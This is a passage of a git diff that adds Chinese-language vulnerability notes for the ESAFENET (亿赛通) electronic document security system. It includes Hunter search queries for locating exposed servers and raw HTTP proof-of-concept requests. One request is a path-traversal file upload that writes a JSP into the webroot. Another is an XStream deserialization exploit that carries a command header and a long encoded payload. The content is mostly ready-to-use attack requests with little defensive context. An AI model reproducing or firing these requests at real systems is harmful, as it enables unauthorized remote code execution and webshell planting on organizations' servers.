+![1706605111262-da8c35eb-506a-4bef-8235-540ebe84fef0.png](./img/IibT0D1-9oe0dU9a/1706605111262-da8c35eb-506a-4bef-8235-540ebe84fef0-498107.png)
+
+
+
+> 更新: 2024-04-20 22:01:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/laxakypzti0idoei>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统DecryptApplicationService2接口任意文件上传.md b/亿赛通电子文档安全管理系统DecryptApplicationService2接口任意文件上传.md
new file mode 100644
index 0000000..d5b968f
--- /dev/null
+++ b/亿赛通电子文档安全管理系统DecryptApplicationService2接口任意文件上传.md
@@ -0,0 +1,40 @@
+# 亿赛通 电子文档安全管理系统 DecryptApplicationService2接口任意文件上传
+
+# 一、漏洞简介
+亿赛通电子文档安全管理系统是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/3DzwHgk0XXbWaCGw/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-368700.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/DecryptApplicationService2?fileId=../../../Program+Files+(x86)/ESAFENET/CDocGuard+Server/tomcat64/webapps/CDGServer3/pentest.jsp HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Host:  IP：PORT
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Cookie: JSESSIONID=B9964151074C71F115A9C803FFF05C34
+Upgrade-Insecure-Requests: 1
+Content-Length: 11
+
+pentest
+```
+
+
+
+<font style="color:rgb(51, 51, 51);">文件地址：/CDGServer3/pentest.jsp</font>
+
+
+
+> 更新: 2024-04-20 22:01:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gbd5spifnesrczm0>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统DecryptionApp存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统DecryptionApp存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..29120e1
--- /dev/null
+++ b/亿赛通电子文档安全管理系统DecryptionApp存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统DecryptionApp存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统DecryptionApp存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/T6HTQQEzJebP8SXq/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-568771.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/DecryptionApp HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNC